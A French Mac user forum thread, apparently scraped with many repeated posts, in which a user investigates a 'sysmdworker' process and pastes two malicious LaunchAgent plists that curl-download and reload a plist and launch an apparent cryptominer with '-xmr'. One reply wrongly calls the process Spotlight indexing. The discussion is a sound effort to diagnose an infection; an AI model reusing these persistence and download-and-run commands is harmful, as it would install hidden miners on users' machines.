Tu devrais envoyer un abuse à protonmail.ch : je ne suis presque sûr que ce ne sont pas eux les initiateurs, mais des malins seservent de leur soi-disant protection des contenus pour installer un distributeur de malware.
josephb@nowhere.invalid (Joseph-B) Wrote in message:
Tu devrais envoyer un abuse à protonmail.ch :
je ne suis presque sûr que ce ne sont pas eux les initiateurs, mais des
malins seservent de leur soi-disant protection des contenus pour
installer un distributeur de malware.
Ce qui est à la mode en ce moment, ce sont les calculateurs de
monnaies virtuelles.
Certains prestataires le font sciemment à l'insu de leurs clients
et poussent les curseurs de temps machine un peu
haut...
Et puis, il y a les injections de code à l'insu des prestataires...
Tu devrais envoyer un abuse à protonmail.ch : je ne suis presque sûr que ce ne sont pas eux les initiateurs, mais des malins seservent de leur soi-disant protection des contenus pour installer un distributeur de malware.
Bonjour C'est quoi "sysmdworker". Mon "nouveau" mini 2011 ventile régulièrement un peu fort et je constate que ce process est à 300% dans ces cas là. Il disparait d'ailleurs rapidement du haut de la liste dès que je lance le 'process viewer'. C'est louche je trouve. Bizarre. Qui peut m'en dire plus ?
Une recherche sur l'internet ne donne aucune trace de sysmdworker. Pourtant je l'ai vu : http://fra.free.fr/Capture.jpg Et il disparait 1-2 secondes après lancement du moniteur d'activité ! (et arrêt de la ventilation) (sinon ça ventile toujours) -- Fra
Fra <fra-PasDeSp@M-alussinan.org> wrote:
Bonjour
C'est quoi "sysmdworker". Mon "nouveau" mini 2011 ventile régulièrement
un peu fort et je constate que ce process est à 300% dans ces cas là.
Il disparait d'ailleurs rapidement du haut de la liste dès que je lance
le 'process viewer'. C'est louche je trouve.
Bizarre. Qui peut m'en dire plus ?
Une recherche sur l'internet ne donne aucune trace de sysmdworker.
Pourtant je l'ai vu :
http://fra.free.fr/Capture.jpg
Et il disparait 1-2 secondes après lancement du moniteur d'activité !
(et arrêt de la ventilation) (sinon ça ventile toujours)
--
Fra
Bonjour C'est quoi "sysmdworker". Mon "nouveau" mini 2011 ventile régulièrement un peu fort et je constate que ce process est à 300% dans ces cas là. Il disparait d'ailleurs rapidement du haut de la liste dès que je lance le 'process viewer'. C'est louche je trouve. Bizarre. Qui peut m'en dire plus ?
Une recherche sur l'internet ne donne aucune trace de sysmdworker. Pourtant je l'ai vu : http://fra.free.fr/Capture.jpg Et il disparait 1-2 secondes après lancement du moniteur d'activité ! (et arrêt de la ventilation) (sinon ça ventile toujours) -- Fra
fra-PasDeSp
Fra wrote:
Bonjour C'est quoi "sysmdworker". Mon "nouveau" mini 2011 ventile régulièrement un peu fort et je constate que ce process est à 300% dans ces cas là. Il disparait d'ailleurs rapidement du haut de la liste dès que je lance le 'process viewer'. C'est louche je trouve. Bizarre. Qui peut m'en dire plus ?
Bonjour C'est quoi "sysmdworker". Mon "nouveau" mini 2011 ventile régulièrement un peu fort et je constate que ce process est à 300% dans ces cas là. Il disparait d'ailleurs rapidement du haut de la liste dès que je lance le 'process viewer'. C'est louche je trouve. Bizarre. Qui peut m'en dire plus ?
Bonjour C'est quoi "sysmdworker". Mon "nouveau" mini 2011 ventile régulièrement un peu fort et je constate que ce process est à 300% dans ces cas là. Il disparait d'ailleurs rapidement du haut de la liste dès que je lance le 'process viewer'. C'est louche je trouve. Bizarre. Qui peut m'en dire plus ?
2 fichiers suspects dans mes launchagents de mon user : MacOSupdate.plist: -----<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>Label</key> <string>MacOSupdate</string> <key>ProgramArguments</key> <array> <string>sh</string> <string>-c</string> <string>launchctl unload -w ~/Library/LaunchAgents/MacOS.plist && rm -rf ~/Library/LaunchAgents/MacOS.plist && curl -o ~/Library/LaunchAgents/MacOS.plist https://public.adobecc.com/files/1UJET2WD0VPD5SD0CRLX0EH2UIEEFF?content_disposition=attachment && launchctl load -w ~/Library/LaunchAgents/MacOS.plist && ~/Library/mdworker/mdworker</string> </array> <key>RunAtLoad</key> <true/> </dict> MacOS.plist ----- <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>Label</key> <string>MacOS</string> <key>ProgramArguments</key> <array> <string>sh</string> <string>-c</string> <string>~/Library/mdworker/sysmdworker -user -xmr</string> </array> <key>RunAtLoad</key> <true/> </dict> </plist> ----- </plist> ----- surtout le 2è qui a dedans le nom du process coupable et un mail bizarre ! Comment c'est arrivé là ?? -- Fra
Fra <fra-PasDeSp@M-alussinan.org> wrote:
Bonjour
C'est quoi "sysmdworker". Mon "nouveau" mini 2011 ventile régulièrement
un peu fort et je constate que ce process est à 300% dans ces cas là.
Il disparait d'ailleurs rapidement du haut de la liste dès que je lance
le 'process viewer'. C'est louche je trouve.
Bizarre. Qui peut m'en dire plus ?
2 fichiers suspects dans mes launchagents de mon user :
Bonjour C'est quoi "sysmdworker". Mon "nouveau" mini 2011 ventile régulièrement un peu fort et je constate que ce process est à 300% dans ces cas là. Il disparait d'ailleurs rapidement du haut de la liste dès que je lance le 'process viewer'. C'est louche je trouve. Bizarre. Qui peut m'en dire plus ?
2 fichiers suspects dans mes launchagents de mon user : MacOSupdate.plist: -----<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>Label</key> <string>MacOSupdate</string> <key>ProgramArguments</key> <array> <string>sh</string> <string>-c</string> <string>launchctl unload -w ~/Library/LaunchAgents/MacOS.plist && rm -rf ~/Library/LaunchAgents/MacOS.plist && curl -o ~/Library/LaunchAgents/MacOS.plist https://public.adobecc.com/files/1UJET2WD0VPD5SD0CRLX0EH2UIEEFF?content_disposition=attachment && launchctl load -w ~/Library/LaunchAgents/MacOS.plist && ~/Library/mdworker/mdworker</string> </array> <key>RunAtLoad</key> <true/> </dict> MacOS.plist ----- <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>Label</key> <string>MacOS</string> <key>ProgramArguments</key> <array> <string>sh</string> <string>-c</string> <string>~/Library/mdworker/sysmdworker -user -xmr</string> </array> <key>RunAtLoad</key> <true/> </dict> </plist> ----- </plist> ----- surtout le 2è qui a dedans le nom du process coupable et un mail bizarre ! Comment c'est arrivé là ?? -- Fra
mv
Fra a attiré mon attention en écrivant :
C'est quoi "sysmdworker". Mon "nouveau" mini 2011 ventile régulièrement un peu fort et je constate que ce process est à 300% dans ces cas là.
Ça fait partie de l'indexation Spotlight au même titre que mdworker et autres bidules du même style. Ton mini est "nouveau", donc l'indexation Spotlight fait son boulot et ça peut durer plus ou moins longtemps. Cordialement. -- Michel Vauquois - <http://michelvauquois.fr> Nouveau : <http://art-doise-4.michelvauquois.free-h.fr> et <http://art-doise-5.michelvauquois.free-h.fr>
Fra <fra-PasDeSp@M-alussinan.org> a attiré mon attention en écrivant :
C'est quoi "sysmdworker". Mon "nouveau" mini 2011 ventile régulièrement
un peu fort et je constate que ce process est à 300% dans ces cas là.
Ça fait partie de l'indexation Spotlight au même titre que mdworker et
autres bidules du même style.
Ton mini est "nouveau", donc l'indexation Spotlight fait son boulot et
ça peut durer plus ou moins longtemps.
Cordialement.
--
Michel Vauquois - <http://michelvauquois.fr>
Nouveau : <http://art-doise-4.michelvauquois.free-h.fr>
et <http://art-doise-5.michelvauquois.free-h.fr>
C'est quoi "sysmdworker". Mon "nouveau" mini 2011 ventile régulièrement un peu fort et je constate que ce process est à 300% dans ces cas là.
Ça fait partie de l'indexation Spotlight au même titre que mdworker et autres bidules du même style. Ton mini est "nouveau", donc l'indexation Spotlight fait son boulot et ça peut durer plus ou moins longtemps. Cordialement. -- Michel Vauquois - <http://michelvauquois.fr> Nouveau : <http://art-doise-4.michelvauquois.free-h.fr> et <http://art-doise-5.michelvauquois.free-h.fr>
fra-PasDeSp
MV wrote:
Fra a attiré mon attention en écrivant :
C'est quoi "sysmdworker". Mon "nouveau" mini 2011 ventile régulièrement un peu fort et je constate que ce process est à 300% dans ces cas là.
Ça fait partie de l'indexation Spotlight au même titre que mdworker et autres bidules du même style. Ton mini est "nouveau", donc l'indexation Spotlight fait son boulot et ça peut durer plus ou moins longtemps.
Sauf que mdworker n'est pas sensé se lancer de mon dossier User (voir autre post sur les launchagents) Je viens de virer un dossier mdworker dans MON dossier Library avec dedans mdworker sysmdworker et un dossier Frameworks avec dedans : QtCore.framework QtNetwork.framework QtSql.framework QtWebSockets.framework Bref plein de faux processes à lancer qui ressemblent à ceux du système. Putain comment j'ai chopé ça ? Je suis super prudent. Et hier je l'avais pas. Les seules choses que j'ai faites c'est l'install de l'ancien disque dans le nouveau mini et l'installation d'une nouvelle version d'Onyx. -- Fra
MV <mv@orange.invalid> wrote:
Fra <fra-PasDeSp@M-alussinan.org> a attiré mon attention en écrivant :
> C'est quoi "sysmdworker". Mon "nouveau" mini 2011 ventile régulièrement
> un peu fort et je constate que ce process est à 300% dans ces cas là.
Ça fait partie de l'indexation Spotlight au même titre que mdworker et
autres bidules du même style.
Ton mini est "nouveau", donc l'indexation Spotlight fait son boulot et
ça peut durer plus ou moins longtemps.
Sauf que mdworker n'est pas sensé se lancer de mon dossier User (voir
autre post sur les launchagents)
Je viens de virer un dossier mdworker dans MON dossier Library avec
dedans mdworker sysmdworker et un dossier Frameworks avec dedans :
QtCore.framework
QtNetwork.framework
QtSql.framework
QtWebSockets.framework
Bref plein de faux processes à lancer qui ressemblent à ceux du système.
Putain comment j'ai chopé ça ? Je suis super prudent. Et hier je l'avais
pas. Les seules choses que j'ai faites c'est l'install de l'ancien
disque dans le nouveau mini et l'installation d'une nouvelle version
d'Onyx.
--
Fra
C'est quoi "sysmdworker". Mon "nouveau" mini 2011 ventile régulièrement un peu fort et je constate que ce process est à 300% dans ces cas là.
Ça fait partie de l'indexation Spotlight au même titre que mdworker et autres bidules du même style. Ton mini est "nouveau", donc l'indexation Spotlight fait son boulot et ça peut durer plus ou moins longtemps.
Sauf que mdworker n'est pas sensé se lancer de mon dossier User (voir autre post sur les launchagents) Je viens de virer un dossier mdworker dans MON dossier Library avec dedans mdworker sysmdworker et un dossier Frameworks avec dedans : QtCore.framework QtNetwork.framework QtSql.framework QtWebSockets.framework Bref plein de faux processes à lancer qui ressemblent à ceux du système. Putain comment j'ai chopé ça ? Je suis super prudent. Et hier je l'avais pas. Les seules choses que j'ai faites c'est l'install de l'ancien disque dans le nouveau mini et l'installation d'une nouvelle version d'Onyx. -- Fra
fra-PasDeSp
Fra wrote:
Bonjour C'est quoi "sysmdworker". Mon "nouveau" mini 2011 ventile régulièrement un peu fort et je constate que ce process est à 300% dans ces cas là. Il disparait d'ailleurs rapidement du haut de la liste dès que je lance le 'process viewer'. C'est louche je trouve. Bizarre. Qui peut m'en dire plus ?
Je penche de plus en plus pour un faux Onyx téléchargé sur MacUpdate (il ne fait que 8,6 MO au lieu d'une 30aine) -- Fra
Fra <fra-PasDeSp@M-alussinan.org> wrote:
Bonjour
C'est quoi "sysmdworker". Mon "nouveau" mini 2011 ventile régulièrement
un peu fort et je constate que ce process est à 300% dans ces cas là.
Il disparait d'ailleurs rapidement du haut de la liste dès que je lance
le 'process viewer'. C'est louche je trouve.
Bizarre. Qui peut m'en dire plus ?
Je penche de plus en plus pour un faux Onyx téléchargé sur MacUpdate (il
ne fait que 8,6 MO au lieu d'une 30aine)
--
Fra
Bonjour C'est quoi "sysmdworker". Mon "nouveau" mini 2011 ventile régulièrement un peu fort et je constate que ce process est à 300% dans ces cas là. Il disparait d'ailleurs rapidement du haut de la liste dès que je lance le 'process viewer'. C'est louche je trouve. Bizarre. Qui peut m'en dire plus ?
Je penche de plus en plus pour un faux Onyx téléchargé sur MacUpdate (il ne fait que 8,6 MO au lieu d'une 30aine) -- Fra
josephb
Bonsoir, Fra wrote:
~/Library/mdworker/sysmdworker
Je suis comme toi en 10.11.6 et je n'ai aucun répertoire /mdworker/ dans la bibliothèque de mon compte. mdworker est un process associé à Spotlight, normalement pas un répertoire et quant sysmdworker, jamais vu non plus. Ça pue le truc forgé de toutes pièces, d'autant que l'on voit que c'est un script shell censé s'effectuer au chargement. Ce pourrait-être un malware qui scanne ton Mac pour en aspirer les infos? Fais une recherche google sur "protonmail", c'est très bizarre et ce n'est pas cette page qui me rassurerait <http://www.konbini.com/fr/tendances-2/protonmail-la-messagerie-suisse-qui-veut-atomiser-gmail-yahoo-et-les-autres/> Si ça peut t'aider -- J. B.
Bonsoir,
Fra <fra-PasDeSp@M-alussinan.org> wrote:
~/Library/mdworker/sysmdworker
Je suis comme toi en 10.11.6 et je n'ai aucun répertoire /mdworker/ dans
la bibliothèque de mon compte.
mdworker est un process associé à Spotlight, normalement pas un
répertoire et quant sysmdworker, jamais vu non plus.
Ça pue le truc forgé de toutes pièces, d'autant que l'on voit que c'est
un script shell censé s'effectuer au chargement.
Ce pourrait-être un malware qui scanne ton Mac pour en aspirer les
infos?
Fais une recherche google sur "protonmail", c'est très bizarre et ce
n'est pas cette page qui me rassurerait
<http://www.konbini.com/fr/tendances-2/protonmail-la-messagerie-suisse-qui-veut-atomiser-gmail-yahoo-et-les-autres/>
Je suis comme toi en 10.11.6 et je n'ai aucun répertoire /mdworker/ dans la bibliothèque de mon compte. mdworker est un process associé à Spotlight, normalement pas un répertoire et quant sysmdworker, jamais vu non plus. Ça pue le truc forgé de toutes pièces, d'autant que l'on voit que c'est un script shell censé s'effectuer au chargement. Ce pourrait-être un malware qui scanne ton Mac pour en aspirer les infos? Fais une recherche google sur "protonmail", c'est très bizarre et ce n'est pas cette page qui me rassurerait <http://www.konbini.com/fr/tendances-2/protonmail-la-messagerie-suisse-qui-veut-atomiser-gmail-yahoo-et-les-autres/> Si ça peut t'aider -- J. B.
